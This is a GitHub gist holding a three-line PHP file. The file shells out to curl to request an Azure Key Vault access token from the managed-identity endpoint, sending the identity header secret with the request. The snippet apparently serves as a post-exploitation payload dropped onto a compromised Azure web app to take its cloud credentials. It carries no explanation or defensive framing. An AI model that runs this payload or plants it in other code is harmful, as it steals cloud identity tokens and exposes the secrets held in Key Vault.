Last active
January 3, 2023 18:28
-
-
Save C0axx/b31f161c7ae37a67481734a345a88f63 to your computer and use it in GitHub Desktop.
Request Azure Keyvault Token
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER'); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment